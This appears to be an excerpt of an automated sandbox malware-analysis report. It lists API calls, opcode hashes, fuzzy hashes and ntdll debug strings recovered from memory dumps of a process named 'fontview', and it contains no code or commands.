                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: 27db7e4f1c40180deb40fba969c72951f2438392983526302a12986646610f5b
                                                                                                                              • Instruction ID: fa99d2a4eb66ebcf6ab05d10af9cd1b37fafcb7b595e5c540ad371bb3a66de39
                                                                                                                              • Opcode Fuzzy Hash: 27db7e4f1c40180deb40fba969c72951f2438392983526302a12986646610f5b
                                                                                                                              • Instruction Fuzzy Hash: 0FE0927228031037E23162A98C02FD7B28CCB81B60F210019FA0DAB1C0DDA6B94146A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02A54423
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              • Opcode ID: ece5c4e44c802038c3c00ab1117330d67c0bc9679ff817112f1a7c9b98d1d4e2
                                                                                                                              • Instruction ID: 5f44e89a4c3a6238c27d260dc03cfda1fe29b4af507cbc046e91002b02e2ef27
                                                                                                                              • Opcode Fuzzy Hash: ece5c4e44c802038c3c00ab1117330d67c0bc9679ff817112f1a7c9b98d1d4e2
                                                                                                                              • Instruction Fuzzy Hash: 05F015B5200208BBDA10EF59DC40EAB77ADEF89710F008009B918A7241DA30B9618BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(02A42003,?,02A535E3,02A42003,02A535D7,02A535E3,?,02A42003,02A535D7,00001000,?,?,02A56D40), ref: 02A5553F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: e1c311fbd65a32222058b270af25a25db7b17eb137dc85a2ea9762b5d7bcab8f
                                                                                                                              • Instruction ID: c6d1092d8ede1a4908cbe4fe7c325c79c6b546e6efc60daa7decb13725038dfb
                                                                                                                              • Opcode Fuzzy Hash: e1c311fbd65a32222058b270af25a25db7b17eb137dc85a2ea9762b5d7bcab8f
                                                                                                                              • Instruction Fuzzy Hash: D7E065B22403047FDA10EE99EC45FAB77ADEFC9B10F008409F908A7241DA30BA108BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45503,00000007,00000000,00000004,00000000,02A439AF,000000F0,?,?,?,?,00000000), ref: 02A5558F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: 973832adfc58f53b01a8be7ba7dbe50df262dfa26736ccdf8cacf5f7a2515294
                                                                                                                              • Instruction ID: 08640acaf44785875cf573a4ffa549674d4d25b11c06ba0bf77f8515fa8c956b
                                                                                                                              • Opcode Fuzzy Hash: 973832adfc58f53b01a8be7ba7dbe50df262dfa26736ccdf8cacf5f7a2515294
                                                                                                                              • Instruction Fuzzy Hash: EBE065B22403057BDA10EE98DC41FEB73ADEFC9B10F004019F908A7241DA30B9108BB9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02A4769C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: daadd9a1ddf99c42297cf972137ca56b7fa0b44c7aa5197b290b57de65c78fb7
                                                                                                                              • Instruction ID: c0d53d0402b945544a7d923000e2c78bd3fd79c36196c443b4353d352126220a
                                                                                                                              • Opcode Fuzzy Hash: daadd9a1ddf99c42297cf972137ca56b7fa0b44c7aa5197b290b57de65c78fb7
                                                                                                                              • Instruction Fuzzy Hash: 01E0867129030427EF246BBCDC86F66735D8BC9728F294660B91CDB2C1EFB8F5019250
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02A54423
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              • Opcode ID: d543bc7ea2c4917e9d630e4f6826782573a037eb49ab14810ce78e9d456bfdb1
                                                                                                                              • Instruction ID: 56bd2c21e0ec26719c9bdfc02c59a00accd66269219e4bccf692bc0ef4cbbe6a
                                                                                                                              • Opcode Fuzzy Hash: d543bc7ea2c4917e9d630e4f6826782573a037eb49ab14810ce78e9d456bfdb1
                                                                                                                              • Instruction Fuzzy Hash: F6E0ECB9204206AF9B08EF58E851CAB7B75EFC96107108146FC1887656D630D965CBB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02A41ADA,02A42249,02A535D7,00000000), ref: 02A474B3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: b48985f2fe184756bdc58c28baab54ef7dafb5f5469c6f46e1ae8c008718acbc
                                                                                                                              • Instruction ID: d979b24e4baad6803214c8ce0b20d83e66f7f556c5873ffe861ce63463865a16
                                                                                                                              • Opcode Fuzzy Hash: b48985f2fe184756bdc58c28baab54ef7dafb5f5469c6f46e1ae8c008718acbc
                                                                                                                              • Instruction Fuzzy Hash: 35D02EB12C03003BF201ABF19C46F26B28C5B44790F024024B90CE72C0ED74E1004661
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04AE4655
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04AE4742
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04AE4725
                                                                                                                              • Execute=1, xrefs: 04AE4713
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04AE46FC
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04AE4787
                                                                                                                              • ExecuteOptions, xrefs: 04AE46A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 04AE031E
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04AE02E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04AE02BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 04AE7BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04AE7B7F
                                                                                                                              • RTL: Resource at %p, xrefs: 04AE7B8E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AE728C
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 04AE72C1
                                                                                                                              • RTL: Resource at %p, xrefs: 04AE72A3
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04AE7294
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: 4aaab1f4460484a243dd249e607d1065b99b0652872ca265cc8e00cfa2740183
                                                                                                                              • Instruction ID: 37b337f810f3ae1ac819f986fdaa2f5e04e75ad11fe4b7170c97c23ec9e179d4
                                                                                                                              • Opcode Fuzzy Hash: 4aaab1f4460484a243dd249e607d1065b99b0652872ca265cc8e00cfa2740183
                                                                                                                              • Instruction Fuzzy Hash: 5241E235700202AFD720DF65CD41B6AB7A5FF84714F100619FA66EB241DB31F8529BE1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: b0731b7823864883ab0079e1be95b906337a09f92129f445ed3fbbaae14dbe97
                                                                                                                              • Instruction ID: 2f31ec24e71fc4ef428bc262782d0501cc523e77a6c89f8f8ba51958a4f5f5f3
                                                                                                                              • Opcode Fuzzy Hash: b0731b7823864883ab0079e1be95b906337a09f92129f445ed3fbbaae14dbe97
                                                                                                                              • Instruction Fuzzy Hash: B83157726001299FDB64DE29CD40BEF77F8EF44614F4445D5E84DE3140EB30BA459BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: 2a715ce5bd03741c52d014097ca8f7c2e3ad6ac0e9c745894ef6a3467d3e668b
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 9A91C774E002159EDB24DF69C8806FEB7BDAF84760F14451AE8D5E72C2E7B4A940C794
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: b00e8900e2788e7035f16fa0b8cfa23ca6c16bb0243479215b98f1adcce49d5b
                                                                                                                              • Instruction ID: 1d5813c415cf01c1282f88727b70c8e1a97e70c1bf8761ea7788df09cf235ed7
                                                                                                                              • Opcode Fuzzy Hash: b00e8900e2788e7035f16fa0b8cfa23ca6c16bb0243479215b98f1adcce49d5b
                                                                                                                              • Instruction Fuzzy Hash: B1811DB2D01269DBDB31DB54CD44BEAB7B8AB08754F0041DAE91AB7240E7346E84CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 04AFCFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4rw@4rw
                                                                                                                              • API String ID: 4062629308-2979693914
                                                                                                                              • Opcode ID: a33a953f52e05e20b23783652be734e3208296f83a0cf1f0f4ff94a8bc958f55
                                                                                                                              • Instruction ID: 12dddc5f9cc89642246547dd6d4cb59d3b18840f83b253cfb94a5691b052e323
                                                                                                                              • Opcode Fuzzy Hash: a33a953f52e05e20b23783652be734e3208296f83a0cf1f0f4ff94a8bc958f55
                                                                                                                              • Instruction Fuzzy Hash: 3A416E72900218DFEB219FE9DD40AADBBB8FF44B14F00446AEE06DB251D738A901DB65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%